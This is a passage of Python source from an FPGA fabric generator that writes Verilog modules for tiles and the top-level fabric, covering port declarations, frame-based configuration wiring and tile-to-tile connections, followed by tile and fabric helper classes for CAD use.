EntityName = GetComponentEntityNameFromFile(line[VHDL_file_position])
print('\t'+EntityName+' Inst_'+EntityName+' (', file=file)
# for port in BEL_Inputs + BEL_Outputs:
# print('\t\t',port,' => ',port,',', file=file)
Inputs = []
Outputs = []
TopInputs = []
TopOutputs = []
# Inputs, Outputs = GetTileComponentPorts(tile_description, mode='SwitchMatrixIndexed')
# changed to: AutoSwitchMatrixIndexed
Inputs, Outputs = GetTileComponentPorts(tile_description, mode='AutoSwitchMatrixIndexed')
# TopInputs, TopOutputs = GetTileComponentPorts(tile_description, mode='TopIndexed')
# changed to: AutoTopIndexed
TopInputs, TopOutputs = GetTileComponentPorts(tile_description, mode='AutoTopIndexed')
for k in range(len(BEL_Inputs+BEL_Outputs)):
print('\t.'+(BEL_Inputs+BEL_Outputs)[k]+'(',end='', file=file)
# note that the BEL outputs (e.g., from the slice component) are the switch matrix inputs
print((Inputs+All_BEL_Outputs+AllJumpWireList+TopOutputs+All_BEL_Inputs+AllJumpWireList)[k].replace('(','[').replace(')',']')+')', end='', file=file)
if NuberOfSwitchMatricesWithConfigPort > 0:
print(',', file=file)
else:
# Verilog does not allow a ',' after the last port connection, so we need the following for NuberOfSwitchMatricesWithConfigPort==0
if k < ((len(BEL_Inputs+BEL_Outputs)) - 1):
print(',', file=file)
else:
print('', file=file)
if NuberOfSwitchMatricesWithConfigPort > 0:
if ConfigBitMode == 'FlipFlopChain':
GenerateVerilog_Conf_Instantiation(file=file, counter=BEL_counter, close=False)
# print('\t // GLOBAL all primitive pins for configuration (not further parsed) ', file=file)
# print('\t\t MODE => Mode, ', file=file)
# print('\t\t CONFin => conf_data('+str(BEL_counter)+'), ', file=file)
# print('\t\t CONFout => conf_data('+str(BEL_counter+1)+'), ', file=file)
# print('\t\t CLK => CLK ', file=file)
if ConfigBitMode == 'frame_based':
BEL_ConfigBits = GetNoConfigBitsFromFile(line[VHDL_file_position])
if BEL_ConfigBits != 'NULL':
# print('DEBUG:',BEL_ConfigBits)
print('\t.ConfigBits(ConfigBits['+str(BEL_ConfigBitsCounter + int(BEL_ConfigBits))+'-1:'+str(BEL_ConfigBitsCounter)+'])', file=file)
BEL_ConfigBitsCounter = BEL_ConfigBitsCounter + int(BEL_ConfigBits)
print('\t);', file=file)
print('\n'+'endmodule', file=file)
return
def GenerateFabricVerilog( FabricFile, file, module = 'eFPGA' ):
# There are of course many possibilities for generating the fabric.
# I decided to generate a flat description as it may allow for a little easier debugging.
# For larger fabrics, this may be an issue, but not for now.
# We only have wires between two adjacent tiles in North, East, South, West direction.
# So we use the output ports to generate wires.
fabric = GetFabric(FabricFile)
y_tiles=len(fabric) # get the number of tiles in vertical direction
x_tiles=len(fabric[0]) # get the number of tiles in horizontal direction
TileTypes = GetCellTypes(fabric)
print('### Found the following tile types:\n',TileTypes)
# Verilog header
# module hard-coded TODO
module_header_ports_list = []
module_header_files = []
TileTypeOutputPorts = []
for tile in TileTypes:
#PrintComponentDeclarationForFile(str(tile)+'_tile.vhdl', file)
module_header_files.append(str(tile)+'_tile.v')
# we need the BEL ports (a little later)
Inputs, Outputs = GetComponentPortsFromFile(str(tile)+'_tile.vhdl')
TileTypeOutputPorts.append(Outputs)
# we first scan all tiles if those have IOs that have to go to top
# the order of this scan is later maintained when instantiating the actual tiles
print('\t//External IO ports exported directly from the corresponding tiles', file=file)
ExternalPorts = []
SharedExternalPorts = []
port_list = []
for y in range(y_tiles):
for x in range(x_tiles):
if (fabric[y][x]) != 'NULL':
# get the top dimension index that describes the tile type (given by fabric[y][x])
# for line in TileTypeOutputPorts[TileTypes.index(fabric[y][x])]:
CurrentTileExternalPorts = GetComponentPortsFromFile(fabric[y][x]+'_tile.vhdl', port='external')
if CurrentTileExternalPorts != []:
for item in CurrentTileExternalPorts:
# we need the PortName and the PortDefinition (everything after the ':') separately
PortName = re.sub('\:.*', '', item)
substitutions = {" ": "", "\t": ""}
PortName=(replace(PortName, substitutions))
PortDefinition = re.sub('^.*\:', '', item)
PortDefinition = PortDefinition.replace('-- ','//').replace('STD_LOGIC;','').replace('\t','')
if re.search('SHARED_PORT', item):
# for the module, we define only the very first for all SHARED_PORTs of any name category
if PortName not in SharedExternalPorts:
module_header_ports_list.append(PortName)
if 'in' in PortDefinition:
PortDefinition = PortDefinition.replace('in','')
port_list.append('\tinput '+PortName+';'+PortDefinition)
elif 'out' in PortDefinition:
PortDefinition = PortDefinition.replace('out','')
port_list.append('\toutput '+PortName+';'+PortDefinition)
SharedExternalPorts.append(PortName)
# we remember the used port name for the component instantiations to come
# for the instantiations, we have to keep track about all external ports
ExternalPorts.append(PortName)
else:
module_header_ports_list.append('Tile_X'+str(x)+'Y'+str(y)+'_'+PortName)
if 'in' in PortDefinition:
PortDefinition = PortDefinition.replace('in','')
port_list.append('\tinput '+'Tile_X'+str(x)+'Y'+str(y)+'_'+PortName+';'+PortDefinition)
elif 'out' in PortDefinition:
PortDefinition = PortDefinition.replace('out','')
port_list.append('\toutput '+'Tile_X'+str(x)+'Y'+str(y)+'_'+PortName+';'+PortDefinition)
# we remember the used port name for the component instantiations to come
# we are maintaining the here used Tile_XxYy prefix as a sanity check
# ExternalPorts = ExternalPorts + 'Tile_X'+str(x)+'Y'+str(y)+'_'+str(PortName)
ExternalPorts.append('Tile_X'+str(x)+'Y'+str(y)+'_'+PortName)
module_header_ports = ', '.join(module_header_ports_list)
if ConfigBitMode == 'frame_based':
module_header_ports += ', FrameData, FrameStrobe'
GenerateVerilog_Header(module_header_ports, file, module, MaxFramesPerCol=str(MaxFramesPerCol), FrameBitsPerRow=str(FrameBitsPerRow),module_header_files = module_header_files)
for line_print in port_list:
print(line_print, file=file)
print('\tinput [(FrameBitsPerRow*'+str(y_tiles)+')-1:0] FrameData; // CONFIG_PORT this is a keyword needed to connect the tile to the bitstream frame register', file=file)
print('\tinput [(MaxFramesPerCol*'+str(x_tiles)+')-1:0] FrameStrobe; // CONFIG_PORT this is a keyword needed to connect the tile to the bitstream frame register ', file=file)
GenerateVerilog_PortsFooter(file, module, ConfigPort=False)
else:
GenerateVerilog_Header(module_header_ports, file, module, MaxFramesPerCol=str(MaxFramesPerCol), FrameBitsPerRow=str(FrameBitsPerRow),module_header_files = module_header_files)
for line_print in port_list:
print(line_print, file=file)
GenerateVerilog_PortsFooter(file, module)
# Verilog signal declarations
print('//signal declarations', file=file)
print('//configuration signal declarations\n', file=file)
tile_counter_FFC = 0
if ConfigBitMode == 'FlipFlopChain':
for y in range(y_tiles):
for x in range(x_tiles):
# for the moment, we assume that all non "NULL" tiles are reconfigurable
# (i.e. are connected to the configuration shift register)
if (fabric[y][x]) != 'NULL':
tile_counter_FFC += 1
print('\twire ['+str(tile_counter_FFC)+':0] conf_data;', file=file)
if ConfigBitMode == 'frame_based':
# for y in range(y_tiles):
# for x in range(x_tiles):
# if (fabric[y][x]) != 'NULL':
# TileConfigBits = GetNoConfigBitsFromFile(str(fabric[y][x])+'_tile.vhdl')
# if TileConfigBits != 'NULL' and int(TileConfigBits) != 0:
# print('signal Tile_X'+str(x)+'Y'+str(y)+'_ConfigBits \t:\t std_logic_vector('+TileConfigBits+' -1 downto '+str(0)+' );', file=file)
# FrameData => Tile_Y3_FrameData,
# FrameStrobe => Tile_X1_FrameStrobe
# MaxFramesPerCol : integer := 20;
# FrameBitsPerRow : integer := 32;
for y in range(y_tiles):
print('\twire [FrameBitsPerRow-1:0] Tile_Y'+str(y)+'_FrameData;', file=file)
for x in range(x_tiles):
print('\twire [MaxFramesPerCol-1:0] Tile_X'+str(x)+'_FrameStrobe;', file=file)
for y in range(y_tiles):
for x in range(x_tiles):
print('\twire [FrameBitsPerRow-1:0] Tile_X'+str(x)+'Y'+str(y)+'_FrameData_O;', file=file)
for y in range(y_tiles):
for x in range(x_tiles):
print('\twire [MaxFramesPerCol-1:0] Tile_X'+str(x)+'Y'+str(y)+'_FrameStrobe_O;', file=file)
print('\n//tile-to-tile signal declarations\n', file=file)
for y in range(y_tiles):
for x in range(x_tiles):
if (fabric[y][x]) != 'NULL':
# get the top dimension index that describes the tile type (given by fabric[y][x])
for line in TileTypeOutputPorts[TileTypes.index(fabric[y][x])]:
# line contains something like "E2BEG : std_logic_vector( 7 downto 0 )" so I use split on '('
SignalName, Vector = re.split('\(',line)
# print('DEBUG line: ', line, file=file)
# print('DEBUG SignalName: ', SignalName, file=file)
# print('DEBUG Vector: ', Vector, file=file)
# Vector = re.sub('//.*', '', Vector)
print('\twire ['+Vector.replace(' downto ',':').replace(' )',']').replace(' ','').replace('\t','')+' Tile_X'+str(x)+'Y'+str(y)+'_'+SignalName+';', file=file)
# top configuration data daisy chaining
# this is copy and paste from the tile code generation (so we can modify this here without side effects)
if ConfigBitMode == 'FlipFlopChain':
print('// top configuration data daisy chaining', file=file)
print('\tassign conf_data[0] = CONFin; // conf_data\'low=0 and CONFin is from tile module', file=file)
print('\tassign CONFout = conf_data['+str(tile_counter_FFC)+']; // CONFout is from tile module', file=file)
elif ConfigBitMode == 'frame_based':
print('', file=file)
for y in range(y_tiles):
print('\tassign Tile_Y'+str(y)+'_FrameData = FrameData[(FrameBitsPerRow*('+str(y)+'+1))-1:FrameBitsPerRow*'+str(y)+'];', file=file)
for x in range(x_tiles):
print('\tassign Tile_X'+str(x)+'_FrameStrobe = FrameStrobe[(MaxFramesPerCol*('+str(x)+'+1))-1:MaxFramesPerCol*'+str(x)+'];', file=file)
# Verilog tile instantiations
tile_counter = 0
ExternalPorts_counter = 0
print('\n//tile instantiations\n', file=file)
for y in range(y_tiles):
for x in range(x_tiles):
if (fabric[y][x]) != 'NULL':
EntityName = GetComponentEntityNameFromFile(str(fabric[y][x])+'_tile.vhdl')
print('\t'+EntityName+' Tile_X'+str(x)+'Y'+str(y)+'_'+EntityName+' (', file=file)
TileInputs, TileOutputs = GetComponentPortsFromFile(str(fabric[y][x])+'_tile.vhdl')
# print('DEBUG TileInputs: ', TileInputs)
# print('DEBUG TileOutputs: ', TileOutputs)
TilePorts = []
TilePortsDebug = []
# for connecting the instance, we write the tile ports in the order all inputs and all outputs
for port in TileInputs + TileOutputs:
# GetComponentPortsFromFile returns vector information that starts with "(..." and we throw that away
# However the vector information is still interesting for debug purpose
TilePorts.append(re.sub(' ','',(re.sub('\(.*', '', port, flags=re.IGNORECASE))))
TilePortsDebug.append(port)
# now we get the connecting input signals in the order NORTH EAST SOUTH WEST (order is given in fabric.csv)
# from the adjacent tiles. For example, a NorthEnd-port is connected to a SouthBeg-port on tile Y+1
# note that fabric[y][x] has its origin [0][0] in the top left corner
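# Hedged example (tile names hypothetical): the NORTH inputs (N*END) of Tile_X2Y2 are driven
# by the N*BEG outputs of Tile_X2Y3, i.e. the tile at y+1 in the fabric list.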
TileInputSignal = []
TileInputSignalCountPerDirection = []
# IMPORTANT: we have to go through the following in NORTH EAST SOUTH WEST order
# NORTH direction: get the NiBEG wires from tile y+1, because they drive NiEND
if y < (y_tiles-1):
if (fabric[y+1][x]) != 'NULL':
TileInputs, TileOutputs = GetComponentPortsFromFile(str(fabric[y+1][x])+'_tile.vhdl', filter='NORTH')
for port in TileOutputs:
TileInputSignal.append('Tile_X'+str(x)+'Y'+str(y+1)+'_'+port)
if TileOutputs == []:
TileInputSignalCountPerDirection.append(0)
else:
TileInputSignalCountPerDirection.append(len(TileOutputs))
else:
TileInputSignalCountPerDirection.append(0)
else:
TileInputSignalCountPerDirection.append(0)
# EAST direction: get the EiBEG wires from tile x-1, because they drive EiEND
if x > 0:
if (fabric[y][x-1]) != 'NULL':
TileInputs, TileOutputs = GetComponentPortsFromFile(str(fabric[y][x-1])+'_tile.vhdl', filter='EAST')
for port in TileOutputs:
TileInputSignal.append('Tile_X'+str(x-1)+'Y'+str(y)+'_'+port)
if TileOutputs == []:
TileInputSignalCountPerDirection.append(0)
else:
TileInputSignalCountPerDirection.append(len(TileOutputs))
else:
TileInputSignalCountPerDirection.append(0)
else:
TileInputSignalCountPerDirection.append(0)
# SOUTH direction: get the SiBEG wires from tile y-1, because they drive SiEND
if y > 0:
if (fabric[y-1][x]) != 'NULL':
TileInputs, TileOutputs = GetComponentPortsFromFile(str(fabric[y-1][x])+'_tile.vhdl', filter='SOUTH')
for port in TileOutputs:
TileInputSignal.append('Tile_X'+str(x)+'Y'+str(y-1)+'_'+port)
if TileOutputs == []:
TileInputSignalCountPerDirection.append(0)
else:
TileInputSignalCountPerDirection.append(len(TileOutputs))
else:
TileInputSignalCountPerDirection.append(0)
else:
TileInputSignalCountPerDirection.append(0)
# WEST direction: get the WiBEG wires from tile x+1, because they drive WiEND
if x < (x_tiles-1):
if (fabric[y][x+1]) != 'NULL':
TileInputs, TileOutputs = GetComponentPortsFromFile(str(fabric[y][x+1])+'_tile.vhdl', filter='WEST')
for port in TileOutputs:
TileInputSignal.append('Tile_X'+str(x+1)+'Y'+str(y)+'_'+port)
if TileOutputs == []:
TileInputSignalCountPerDirection.append(0)
else:
TileInputSignalCountPerDirection.append(len(TileOutputs))
else:
TileInputSignalCountPerDirection.append(0)
else:
TileInputSignalCountPerDirection.append(0)
# at this point, TileInputSignal is carrying all the driver signals from the surrounding tiles (the BEG signals of those tiles)
# for example when we are on Tile_X2Y2, the first entry could be "Tile_X2Y3_N1BEG( 3 downto 0 )"
# for element in TileInputSignal:
# print('DEBUG TileInputSignal :'+'Tile_X'+str(x)+'Y'+str(y), element)
# the output signals are named after the output ports
TileOutputSignal = []
TileInputsCountPerDirection = []
# as for the VHDL signal generation, we simply add a prefix like "Tile_X1Y0_" to the begin port
# for port in TileOutputs:
# TileOutputSignal.append('Tile_X'+str(x)+'Y'+str(y)+'_'+port)
if (fabric[y][x]) != 'NULL':
TileInputs, TileOutputs = GetComponentPortsFromFile(str(fabric[y][x])+'_tile.vhdl', filter='NORTH')
for port in TileOutputs:
TileOutputSignal.append('Tile_X'+str(x)+'Y'+str(y)+'_'+port)
TileInputsCountPerDirection.append(len(TileInputs))
TileInputs, TileOutputs = GetComponentPortsFromFile(str(fabric[y][x])+'_tile.vhdl', filter='EAST')
for port in TileOutputs:
TileOutputSignal.append('Tile_X'+str(x)+'Y'+str(y)+'_'+port)
TileInputsCountPerDirection.append(len(TileInputs))
TileInputs, TileOutputs = GetComponentPortsFromFile(str(fabric[y][x])+'_tile.vhdl', filter='SOUTH')
for port in TileOutputs:
TileOutputSignal.append('Tile_X'+str(x)+'Y'+str(y)+'_'+port)
TileInputsCountPerDirection.append(len(TileInputs))
TileInputs, TileOutputs = GetComponentPortsFromFile(str(fabric[y][x])+'_tile.vhdl', filter='WEST')
for port in TileOutputs:
TileOutputSignal.append('Tile_X'+str(x)+'Y'+str(y)+'_'+port)
TileInputsCountPerDirection.append(len(TileInputs))
# at this point, TileOutputSignal is carrying all the signal names that will be driven by the present tile
# for example when we are on Tile_X2Y2, the first entry could be "Tile_X2Y2_W1BEG( 3 downto 0 )"
# for element in TileOutputSignal:
# print('DEBUG TileOutputSignal :'+'Tile_X'+str(x)+'Y'+str(y), element)
if (fabric[y][x]) != 'NULL': # looks like this conditional is redundant
TileInputs, TileOutputs = GetComponentPortsFromFile(str(fabric[y][x])+'_tile.vhdl')
# example: W6END( 11 downto 0 ), N1BEG( 3 downto 0 ), ...
# meaning: the END-ports are the tile inputs followed by the actual tile output ports (typically BEG)
# this is essentially the left side (the component ports) of the component instantiation
CheckFailed = False
# sanity check: The number of input ports has to match the TileInputSignal per direction (N,E,S,W)
if (fabric[y][x]) != 'NULL':
for k in range(0,4):
if TileInputsCountPerDirection[k] != TileInputSignalCountPerDirection[k]:
print('ERROR: component input mismatch in '+str(All_Directions[k])+' direction for Tile_X'+str(x)+'Y'+str(y)+' of type '+str(fabric[y][x]))
CheckFailed = True
if CheckFailed == True:
print('Error in function GenerateFabricVerilog')
print('DEBUG:TileInputs: ',TileInputs)
print('DEBUG:TileInputSignal: ',TileInputSignal)
print('DEBUG:TileOutputs: ',TileOutputs)
print('DEBUG:TileOutputSignal: ',TileOutputSignal)
# raise ValueError('Error in function GenerateFabricVHDL')
# the output ports are derived from the same list and should therefore match automatically
# for element in (TileInputs+TileOutputs):
# print('DEBUG TileInputs+TileOutputs :'+'Tile_X'+str(x)+'Y'+str(y)+'element:', element)
if (fabric[y][x]) != 'NULL': # looks like this conditional is redundant
for k in range(0,len(TileInputs)):
PortName = re.sub('\(.*', '', TileInputs[k])
print('\t.'+PortName+'('+TileInputSignal[k].replace('(','[').replace(')',']').replace(' downto ',':').replace(' ','').replace('\t','')+'),',file=file)
# print('DEBUG_INPUT: '+PortName+'\t=> '+TileInputSignal[k]+',')
for k in range(0,len(TileOutputs)):
PortName = re.sub('\(.*', '', TileOutputs[k])
print('\t.'+PortName+'('+TileOutputSignal[k].replace('(','[').replace(')',']').replace(' downto ',':').replace(' ','').replace('\t','')+'),',file=file)
# print('DEBUG_OUTPUT: '+PortName+'\t=> '+TileOutputSignal[k]+',')
# Check if this tile uses IO-pins that have to be connected to the top-level module
CurrentTileExternalPorts = GetComponentPortsFromFile(fabric[y][x]+'_tile.vhdl', port='external')
if CurrentTileExternalPorts != []:
print('\t//tile IO port which gets directly connected to top-level tile module', file=file)
for item in CurrentTileExternalPorts:
# we need the PortName and the PortDefinition (everything after the ':') separately
PortName = re.sub('\:.*', '', item)
substitutions = {" ": "", "\t": ""}
PortName=(replace(PortName, substitutions))
PortDefinition = re.sub('^.*\:', '', item)
# ExternalPorts was populated when writing the fabric top level module
print('\t.'+PortName+'('+ExternalPorts[ExternalPorts_counter].replace('(','[').replace(')',']').replace(' downto ',':').replace(' ','').replace('\t','')+'),', file=file)
ExternalPorts_counter += 1
if ConfigBitMode == 'FlipFlopChain':
GenerateVHDL_Conf_Instantiation(file=file, counter=tile_counter, close=True)
if ConfigBitMode == 'frame_based':
if (fabric[y][x]) != 'NULL':
TileConfigBits = GetNoConfigBitsFromFile(str(fabric[y][x])+'_tile.vhdl')
if TileConfigBits != 'NULL':
if int(TileConfigBits) == 0:
# print('\t\t ConfigBits => (others => \'-\') );\n', file=file)
# the next one is fixing the fact that the last port assignment in vhdl is not allowed to have a ','
# this is a bit ugly, but well, vhdl is ugly too...
#last_pos = file.tell()
#for k in range(20):
# file.seek(last_pos -k) # scan character by character backwards and look for ','
# my_char = file.read(1)
# if my_char == ',':
# file.seek(last_pos -k) # place seek pointer to last ',' position and overwrite with a space
# print(' ', end='', file=file)
# break # stop scan
#file.seek(0, os.SEEK_END) # go back to usual...
#print('\t);\n', file=file)
if x == 1 and y == y_tiles-1:
print('\t.FrameData('+'Tile_Y'+str(y)+'_FrameData), ' , file=file)
print('\t.FrameData_O('+'Tile_X'+str(x)+'Y'+str(y)+'_FrameData_O), ' , file=file)
print('\t.FrameStrobe('+'Tile_X'+str(x)+'_FrameStrobe),' , file=file)
print('\t.FrameStrobe_O('+'Tile_X'+str(x)+'Y'+str(y)+'_FrameStrobe_O)\n\t);\n' , file=file)
elif x != 1 and y == y_tiles-1:
print('\t.FrameData('+'Tile_X'+str(x-1)+'Y'+str(y)+'_FrameData_O), ' , file=file)
print('\t.FrameData_O('+'Tile_X'+str(x)+'Y'+str(y)+'_FrameData_O), ' , file=file)
print('\t.FrameStrobe('+'Tile_X'+str(x)+'_FrameStrobe),' , file=file)
print('\t.FrameStrobe_O('+'Tile_X'+str(x)+'Y'+str(y)+'_FrameStrobe_O)\n\t);\n' , file=file)
elif x == 1 and y != y_tiles-1:
print('\t.FrameData('+'Tile_Y'+str(y)+'_FrameData), ' , file=file)
print('\t.FrameData_O('+'Tile_X'+str(x)+'Y'+str(y)+'_FrameData_O), ' , file=file)
print('\t.FrameStrobe('+'Tile_X'+str(x)+'Y'+str(y+1)+'_FrameStrobe_O),' , file=file)
print('\t.FrameStrobe_O('+'Tile_X'+str(x)+'Y'+str(y)+'_FrameStrobe_O)\n\t);\n' , file=file)
else:
print('\t.FrameData('+'Tile_X'+str(x-1)+'Y'+str(y)+'_FrameData_O), ' , file=file)
print('\t.FrameData_O('+'Tile_X'+str(x)+'Y'+str(y)+'_FrameData_O), ' , file=file)
print('\t.FrameStrobe('+'Tile_X'+str(x)+'Y'+str(y+1)+'_FrameStrobe_O),' , file=file)
print('\t.FrameStrobe_O('+'Tile_X'+str(x)+'Y'+str(y)+'_FrameStrobe_O)\n\t);\n' , file=file)
else:
if x == 0 and y != y_tiles-2:
print('\t.FrameData('+'Tile_Y'+str(y)+'_FrameData), ' , file=file)
print('\t.FrameData_O('+'Tile_X'+str(x)+'Y'+str(y)+'_FrameData_O), ' , file=file)
print('\t.FrameStrobe('+'Tile_X'+str(x)+'Y'+str(y+1)+'_FrameStrobe_O),' , file=file)
print('\t.FrameStrobe_O('+'Tile_X'+str(x)+'Y'+str(y)+'_FrameStrobe_O)\n\t);\n' , file=file)
elif x == 0 and y == y_tiles-2:
print('\t.FrameData('+'Tile_Y'+str(y)+'_FrameData), ' , file=file)
print('\t.FrameData_O('+'Tile_X'+str(x)+'Y'+str(y)+'_FrameData_O), ' , file=file)
print('\t.FrameStrobe('+'Tile_X'+str(x)+'_FrameStrobe),' , file=file)
print('\t.FrameStrobe_O('+'Tile_X'+str(x)+'Y'+str(y)+'_FrameStrobe_O)\n\t);\n' , file=file)
elif x == x_tiles-1 and y == y_tiles-2:
print('\t.FrameData('+'Tile_X'+str(x-1)+'Y'+str(y)+'_FrameData_O), ' , file=file)
print('\t.FrameData_O('+'Tile_X'+str(x)+'Y'+str(y)+'_FrameData_O), ' , file=file)
print('\t.FrameStrobe('+'Tile_X'+str(x)+'_FrameStrobe),' , file=file)
print('\t.FrameStrobe_O('+'Tile_X'+str(x)+'Y'+str(y)+'_FrameStrobe_O)\n\t);\n' , file=file)
else :
print('\t.FrameData('+'Tile_X'+str(x-1)+'Y'+str(y)+'_FrameData_O), ' , file=file)
print('\t.FrameData_O('+'Tile_X'+str(x)+'Y'+str(y)+'_FrameData_O), ' , file=file)
print('\t.FrameStrobe('+'Tile_X'+str(x)+'Y'+str(y+1)+'_FrameStrobe_O),' , file=file)
print('\t.FrameStrobe_O('+'Tile_X'+str(x)+'Y'+str(y)+'_FrameStrobe_O)\n\t);\n' , file=file)
#print('\t\t ConfigBits => ConfigBits ( '+str(TileConfigBits)+' -1 downto '+str(0)+' ) );\n', file=file)
### BEL_ConfigBitsCounter = BEL_ConfigBitsCounter + int(BEL_ConfigBits)
tile_counter += 1
print('\n'+'endmodule', file=file)
return
def GenerateVerilog_Header(module_header_ports, file, module, package='' , NoConfigBits='0', MaxFramesPerCol='NULL', FrameBitsPerRow='NULL', module_header_files=[]):
# timescale
#print('`timescale 1ps/1ps', file=file)
# library template
#if package != '':
#package = '`include "models_pack.v"'
#print(package, file=file)
#for hfile in module_header_files:
#print('`include "'+hfile+'"', file=file)
#print('', file=file)
# module
print('module '+module+' ('+module_header_ports +');', file=file)
if MaxFramesPerCol != 'NULL':
print('\tparameter MaxFramesPerCol = '+MaxFramesPerCol+';', file=file)
if FrameBitsPerRow != 'NULL':
print('\tparameter FrameBitsPerRow = '+FrameBitsPerRow+';', file=file)
print('\tparameter NoConfigBits = '+NoConfigBits+';', file=file)
return
def GenerateVerilog_PortsFooter ( file, module, ConfigPort=True , NumberOfConfigBits = ''):
print('\t//global', file=file)
if ConfigPort==False:
# stupid Verilog doesn't allow us to finish the last port signal declaration with a ';',
# so we pragmatically delete that if we have no config port
# TODO - move this into a function, but only if we have a regression suite in place
# TODO - move this into a function, but only if we have a regression suite in place
# TODO - move this into a function, but only if we have a regression suite in place
#file.seek(0) # seek to beginning of the file
#last_pos = 0 # we use this variable to find the position of last ';'
#while True:
# my_char = file.read(1)
# if not my_char:
# break
# else:
# if my_char == ';': # scan character by character and look for ';'
# last_pos = file.tell()
#file.seek(last_pos-1) # place seek pointer to last ';' position and overwrite with a space
#print(' ', end='', file=file)
#file.seek(0, os.SEEK_END) # go back to usual...
# file.seek(interupt_pos)
# file.seek(0, os.SEEK_END) # seek to end of file; f.seek(0, 2) is legal
# file.seek(file.tell() - 3, os.SEEK_SET) # go backwards 3 bytes
# file.truncate()
print('', file=file)
elif ConfigPort==True:
if ConfigBitMode == 'FlipFlopChain':
print('\tinput MODE;//global signal 1: configuration, 0: operation', file=file)
print('\tinput CONFin;', file=file)
print('\toutput CONFout;', file=file)
print('\tinput CLK;', file=file)
elif ConfigBitMode == 'frame_based':
print('\tinput [NoConfigBits-1:0] ConfigBits;', file=file)
print('', file=file)
return
def PrintTileComponentPort_Verilog (tile_description, port_direction, file ):
print('\t// ',port_direction, file=file)
for line in tile_description:
if line[0] == port_direction:
if line[source_name] != 'NULL':
print('\toutput ['+str(((abs(int(line[X_offset]))+abs(int(line[Y_offset])))*int(line[wires]))-1)+':0] '+line[source_name]+';',end='', file=file)
print(' //wires:'+line[wires], end=' ', file=file)
print('X_offset:'+line[X_offset], 'Y_offset:'+line[Y_offset], ' ', end='', file=file)
print('source_name:'+line[source_name], 'destination_name:'+line[destination_name], ' \n', end='', file=file)
for line in tile_description:
if line[0] == port_direction:
if line[destination_name] != 'NULL':
print('\tinput ['+str(((abs(int(line[X_offset]))+abs(int(line[Y_offset])))*int(line[wires]))-1)+':0] '+line[destination_name]+';', end='', file=file)
print(' //wires:'+line[wires], end=' ', file=file)
print('X_offset:'+line[X_offset], 'Y_offset:'+line[Y_offset], ' ', end='', file=file)
print('source_name:'+line[source_name], 'destination_name:'+line[destination_name], ' \n', end='', file=file)
return
def GetTileComponentPort_Verilog (tile_description, port_direction):
ports = []
for line in tile_description:
if line[0] == port_direction:
if line[source_name] != 'NULL':
ports.append(line[source_name])
for line in tile_description:
if line[0] == port_direction:
if line[destination_name] != 'NULL':
ports.append(line[destination_name])
#ports_str = ', '.join(ports)
return ports
def GenerateVerilog_Conf_Instantiation ( file, counter, close=True ):
print('\t//GLOBAL all primitive pins for configuration (not further parsed)', file=file)
print('\t.MODE(Mode),', file=file)
print('\t.CONFin(conf_data['+str(counter)+']),', file=file)
print('\t.CONFout(conf_data['+str(counter+1)+']),', file=file)
if close==True:
print('\t.CLK(CLK)', file=file)
print('\t);\n', file=file)
else:
print('\t.CLK(CLK),', file=file)
return
def GetVerilogDeclarationForFile(VHDL_file_name):
ConfigPortUsed = 0 # 1 means is used
VHDLfile = [line.rstrip('\n') for line in open(VHDL_file_name)]
templist = []
# for item in VHDLfile:
# print(item)
for line in VHDLfile:
# NumberOfConfigBits:0 means no configuration port
if re.search('NumberOfConfigBits', line, flags=re.IGNORECASE):
# NumberOfConfigBits appears, so we may have a config port
ConfigPortUsed = 1
# but only if the following is not true
if re.search('NumberOfConfigBits:0', line, flags=re.IGNORECASE):
ConfigPortUsed = 0
#print('', file=file)
return ConfigPortUsed
#CAD methods from summer vacation project 2020 by Bea
sDelay = "8"
GNDRE = re.compile("GND(\d*)")
VCCRE = re.compile("VCC(\d*)")
BracketAddingRE = re.compile(r"^(\S+?)(\d+)$")
letters = ["A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W"] #For LUT labelling
#This class represents individual tiles in the architecture
class Tile:
tileType = ""
bels = []
wires = []
atomicWires = [] #For storing single wires (to handle cascading and termination)
pips = []
belPorts = set()
matrixFileName = ""
pipMuxes_MapSourceToSinks= []
pipMuxes_MapSinkToSources= []
x = -1 #Init with negative values to ease debugging
y = -1
def __init__(self, inType):
self.tileType = inType
def genTileLoc(self, separate = False):
if (separate):
return("X" + str(self.x), "Y" + str(self.y))
return "X" + str(self.x) + "Y" + str(self.y)
#This class represents the fabric as a whole
class Fabric:
tiles = []
height = 0
width = 0
cellTypes = []
def __init__(self, inHeight, inWidth):
self.width = inWidth
self.height = inHeight
def getTileByCoords(self, x: int, y: int):
for row in self.tiles:
for tile in row:
if tile.x == x and tile.y == y:
return tile
return None
def getTileByLoc(self, loc: str):
for row in self.tiles:
for tile in row:
if tile.genTileLoc() == loc:
return tile
return None
def getTileAndWireByWireDest(self, loc: str, dest: str, jumps: bool = True):
for row in self.tiles:
for tile in row:
for wire in tile.wires:
if not jumps:
if wire["direction"] == "JUMP":
continue
for i in range(int(wire["wire-count"])):
desty = tile.y + int(wire["yoffset"])
destx = tile.x + int(wire["xoffset"])
desttileLoc = f"X{destx}Y{desty}"
if (desttileLoc == loc) and (wire["destination"] + str(i) == dest):
return (tile, wire, i)
return None
#Method to add square brackets for wire pair generation (to account for different reference styles)
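# Hedged example: 'E2BEG3' becomes 'E2BEG[3]', unless 'E2BEG3' is listed in tile.belPorts,
# in which case it is returned unchanged.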
def addBrackets(portIn: str, tile: Tile):
BracketMatch = BracketAddingRE.match(portIn)
if BracketMatch and portIn not in tile.belPorts:
return BracketMatch.group(1) + "[" + BracketMatch.group(2) + "]"
else:
return portIn
#This function gets a relevant instance of a tile for a given type - this just saves adding more object attributes
def getTileByType(fabricObject: Fabric, cellType: str):
for line in fabricObject.tiles:
for tile in line:
if tile.tileType == cellType:
return tile
return None
#This function parses the contents of a CSV with comments removed to get where potential interconnects are
#The current implementation has two potential outputs: pips is a list of pairings (designed for single PIPs), whereas pipsdict maps each source to all possible sinks (designed with multiplexers in mind)
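# Hedged example (tiny hypothetical adjacency CSV with sources A, B and a single sink S where only
# A->S is marked '1'): pips would be [['A', 'S']]; with returnDict=True and mapSourceToSinks=True,
# the returned pipsdict would be {'A': ['S']}.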
def findPipList(csvFile: list, returnDict: bool = False, mapSourceToSinks: bool = False):
sinks = [line[0] for line in csvFile]
sources = csvFile[0]
pips = []
pipsdict = {}
#print(csvFile[1::])
for y, row in enumerate(csvFile[1::]):
#print(row[1:-2:])
for x, value in enumerate(row[1::]):
#print(value)
#Remember that x and y are offset
if value == "1":
pips.append([sources[x+1], sinks[y+1]])
if mapSourceToSinks:
